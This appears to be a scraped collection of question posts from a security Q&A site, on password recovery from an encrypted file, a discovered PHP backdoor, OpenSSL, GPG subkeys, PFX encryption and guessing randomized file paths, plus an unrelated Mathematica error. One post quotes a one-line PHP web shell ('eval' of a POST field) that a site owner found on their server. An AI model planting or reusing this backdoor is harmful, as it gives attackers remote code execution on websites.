How to find the hashed password contained in an encrypted file? [closed]

I have an encrypted "*.pbl" file (100kb) that contain my forgotten password. My password is very easy: number+lower case letters with length=6. Once I find the Hashed password I’ll quickly recover my password.

Of course the hash of a file can be found but it is still not the hash of a password. How do I find the hashed password?

One thing I could possibly do is to create another account with another password; this way I can generate a new encrypted file with the exactly same format and I might be able to find the position of my passwords.

PS: I did check related post but obviously I don’t need to do things like SQL injection because the file has always been on my local machine.

.php code in .txt file with eval() function [duplicate]

I have found three files with name as below:

  a.phpfile.txt   b.phpfile.txt   c.phpfile.txt 

when i open, each file contained with the following code:

  <?php @eval($  _POST[x]); 

I have deleted all the pages from my website, but i am need to know that with the above code, what a hacker can do with my site?

I think, the files were uploaded by the hackers using sqlmap because i had created db user with full privileges on database. So, I changed the permissions of the website users as well.

Can Windows CMD/DOS Commands Be Used In An OpenSSL Configuration File On Windows 10? [migrated]

I’m using OpenSSL v1.1.1g on a Windows 10 machine (I don’t know Linux – yet). Can Windows CMD/DOS commands be used in the OpenSSL configuration file or is the configuration file limited to the use of OpenSSL commands only? I assume the answer to this question is "No" since OpenSSL uses its own parser to process OpenSSL configuration files, but I’d like to have my assumption confirmed.

GPG Questions About Exporting Subkeys to File

GPG novice here so please bear with me.

From what I understand, when you generate a keypair with GPG it will automatically create a subkey pair (sub, ssb).

If I wanted to give these to another party where they could encrypt messages with the public subkey (sub), and send messages over HTTP/REST so I can decrypt with the sub private key (ssb) and sign with the subkey, would all I need to do is just export these keys and use the keys when decrypting or signing programatically?

The main point of the question is if what i explained above is correct, I am unsure of how to export just the subkey pair to file in plain text (aka beginning with —-BEGIN PGP PRIVATE/PUBLIC KEY BLOCK—–). if this is not the case, I would like to be pointed in the right direction

Would the master key (SC) ever come into play in this flow? Is it possible to just do the flow with just the subkeys.

Thank you in advance.

pfx file encryption algorithm

This seems like it should easily documented but I am unable to find.

My c# code does this to create a pfx file.

X509Certificate2 cert = store.Certificates.Find(X509FindType.FindByThumbprint, thumbPrint, false);                     File.WriteAllBytes("certFile.pfx", **cert.Export(X509ContentType.Pfx, password)**); 

The class X509Certificate2 is from System.Security.Cryptography.X509Certificates which appears to be a built-in .NET library.

I would like to know what encryption algorithm is being used to protect the pfx file. I want to confirm whether it is AES256 or not, but I can’t seem to find this information anywhere.

I tried running this OpenSSL command on my "certFile.pfx" file. I had trouble with password so I used "no password" command line. Does this mean that the pfx file is encrypted using TripleDES?!

enter image description here

Find path of file on website with randomized string in it

Users have the possibility to upload a sensitive personal file to a specific website. After uploading, only the user himself and the administrator of the website have the ability to download the file again.

All files of any user are uploaded to the following folder:

Before a file is uploaded, it gets renamed to <<username>>.docx.

So for Foo the path would be: and for Gux it’d be

As you can see, this is not safe at all. Foo could simply examine the download link, and replace his own name in the file-path with the username of other users to download their files.

So to prevent this, the web-developer did the following: Before a file is uploaded, a random string of 15 characters gets prepended to the filename. This random string is different for each upload.

For Foo this would be for example and for Gux

When Foo examines the download-url, he will know in which folder all the files are stored. But there is no way that he could guess the random string that is prepended to Gux’ file. The random string actually functions as a 15-character long password.

In all directories an index.html-file is placed so the directory content does not get listed.

If Foo still wanted to download other users their files, how would he do that? I’m looking for a way Foo would do this by forming a specific URL or HTTP-request. Breaching the server or database is a correct answer but not the kind I’m looking for.

TL;DR: How to find the path of a file on a public website with a unique and randomized string in it? You know the path to the upload-folder, but there is a index.html-file there so you can’t see the content.

LinkOpen::linke: Specified file is not a MathLink executable. in AceGen

I tried to run AceGen/AceFEM on my Mac(10.15.5). I installed Mathematica ( successfully and also the latest version of the AcePackage (7.113). The installation of the AcePackage is successful, saying the C compiler is found. Now I can build an element (from the MainLibrary) for example, but running a simulation is not possible. Both packages can be loaded, but executing the SMTInputData[]; command gives the following error.

LinkOpen: Specified file is not a MathLink executable..  External numerical module is closed. Please restart Mathematica and try again. If the error repeats rebuild and recompile all user elements in debug mode. 

The latest version of Xcode is installed as well.

What can I do?

Thanks for your help!